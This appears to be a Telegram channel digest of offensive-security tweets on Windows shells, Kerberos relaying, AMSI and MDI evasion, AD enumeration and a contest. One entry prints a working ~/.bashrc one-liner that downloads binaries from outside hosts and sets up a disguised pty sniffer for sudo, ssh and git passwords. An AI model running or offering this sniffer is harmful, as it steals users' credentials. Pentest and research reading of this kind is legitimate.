😈 [ Viking @Vikingfr ]
How named pipes and Powershell could be used for creating Windows bind / reverse shell re-using Windows SMB port ? I show you in this blog post 😉
🔗 https://v1k1ngfr.github.io/fuegoshell/
🐥 [ tweet ]
👍10
😈 [ ap @decoder_it ]
#SilverPotato also works with Kerberos, using the @tiraniddo trick I mentioned in my latest post.
You will get an AP-REQ with the SPN of the desired target server. Relaying is now just one step away..
🐥 [ tweet ]
👍5
😈 [ Raphael DUCOM @rducom ]
@techspence Or even better, use our automated loop:
🔗 https://github.com/LuccaSA/PingCastle-Notify
Credits: @mpgn_x64
🐥 [ tweet ]
This is such an awesome writeup, but it's missing one thing - remediation steps
Some AD admins may know how to fix these issues, but it's fair to assume some do not.
I'd also highly recommend using PingCastle by @mysmartlogon as it audits most of this and more.
I have never used PingCastle, but it looks like something you could recommend as a poor man's AD check-up on a regular basis
🔥2👍1🥱1
😈 [ Elliot @ElliotKillick ]
Reverse engineering the Windows 10 parallel loader is challenging but interesting work. I recently fully reversed the pivotal LdrpDrainWorkQueue function and I'm just now working on LdrpLoadDllInternal plus others
🔗 https://github.com/ElliotKillick/windows-vs-linux-loader-architecture#reverse-engineered-windows-loader-functions
🐥 [ tweet ]
🔥4
I’ve missed the moment when the Ascension Endgame has been retired on @hackthebox_eu, but finally, here’s my write-up:
🔗 https://snovvcrash.rocks/2024/04/30/htb-ascension.html
This blog has been waiting its time in my drafts for almost 3 years now, and for me, this Endgame is still the best advanced lab on #HackTheBox. Many thanks to @egre55, @0_trx and all the @hackthebox_eu team!
P. S. It’s so cringe to read your own 3-year-old notes 🤦🏻♂️😅
🐥 [ tweet ]
👍11🥱2🔥1
Offensive Xwitter
😈 [ James Forshaw @tiraniddo ]
Taking a cue from @D1iv3 and @decoder_it's work on inducing authentication out of remote DCOM I thought I'd quickly write up a post about getting Kerberos authentication out of the initial OXID resolving call.
🔗 https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
🐥 [ tweet ]
👍2🤯1
😈 [ Hope Walker @Icemoonhsv ]
Published part 2 of Manual LDAP Querying. This blog covers additional topics like user account control, password attributes, domain trusts, and more.
🔗 https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3
🐥 [ tweet ]
👍4
😈 [ BC Security @bcsecurity ]
Missed the IronPython workshop? No worries, we have you covered with the recording posted to YouTube!
🔗 https://youtu.be/9XI1stt3gdE?si=drwkE6th39vCZlaj
🐥 [ tweet ]
YouTube
Introduction to Offensive IronPython - April 2024
🔥6👍1
😈 [ OffSec @offsectraining ]
This blog introduces a new 0day technique discovered by OffSec Technical Trainer Victor “Vixx” Khoury, the process he used to exploit it, and the proof of concept code to bypass AMSI in PowerShell 5.1 and PowerShell 7.4:
🔗 https://offs.ec/44owQR3
🐥 [ tweet ]
🔥3🥱2😁1
Forwarded from true_security
This feature can be used to pull creds out of lsass in combination with the methods described here
P.S. There I was, collecting and collecting info, and snovvcrash had already described it all long ago =/
👍10
How do you feel about ads on the channel?
Anonymous Poll
65%
I can live with it, the author sucks anyway 🥰
35%
Strongly negative, unsubscribing 🤬
👍1🥱1
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/noscript" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
Neat, reminded me of https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥15😢1
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
🔥6👍1🥱1
Forwarded from Young Researchers Reward Program
Our friends at Positive Technologies have given us 6 passes to PHDays to run a charity contest. Read the details below!
You write an anonymized report describing your most interesting bug and send it to the bot. The jury will evaluate it later, and on 17 May we will contact the participants and hand out their well-deserved prizes.
The jury will pick the top 6 participants for full or partial reimbursement of tickets to Positive Hack Days and back!
1. Be a school pupil or an undergraduate (bachelor's or specialist) student
2. Send a .docx or .pdf file describing the bug to our bot (the file caption must contain the word "Заявка", i.e. "Application")
6 May, 15:00 - submissions open
13 May, 15:00 - submissions close
17 May, 17:00 - results announced
1. Thoroughness of the description (3 points)
2. Exploitation complexity (2 points)
3. Non-standard approach and creativity (3 points)
4. Wow effect (subjective, at the jury members' discretion) (2 points)
@SidneyJob (pentester, author of the channel Заметочки SidneyJob)
@curiv (pentester, infosec community activist, founder of @dc7342 and @permctf, author of the channel @pathsecure)
@cyrus_0x00 (pentester at DeteAct)
@brotherok (bug hunter, author of the channel ШКИБыть)
@bughunter_circuit (author of a channel about bug hunting)
@romanpnn (author of the channel Пакет Безопасности)
@wr3dmast3r (pentester, author of the channel wr3dmast3r vs pentest)
@r00t_owl (director of the cyber threat counteraction department, author of the channel PRO:PENTEST)
<final jury list to be confirmed>
The travel budget for all participants is 120 thousand. We spend the entire planned budget, including toward reimbursing travel costs for the other winners.
📃 What happens to the reports?
We plan to publish the winners' reports (with the author's consent)
👉 Important detail: the jury and the budget are put together by independent volunteer members of the Russian-speaking infosec community. The contest should be seen as charity toward promising young talent. We are convinced that the future of the infosec community lies with such specialists.
Telegram
Positive Technologies
For more than 20 years our main task has been to prevent hacker attacks before they cause unacceptable damage to businesses and entire countries.
Registration in the RKN registry: https://knd.gov.ru/license?id=673b47eab7aeb106ceff4f97&registryType=bloggersPermission
👍6🥱2🔥1
😈 [ Synacktiv @Synacktiv ]
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
🐥 [ tweet ]
🔥6🤔1
😈 [ Oddvar Moe @Oddvarmoe ]
Created a script using ADExplorerSnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43
Decided to go with || as a separator on the out files. Should be easy to parse with cut -d "|"
🐥 [ tweet ]
👍7
🔥6👍4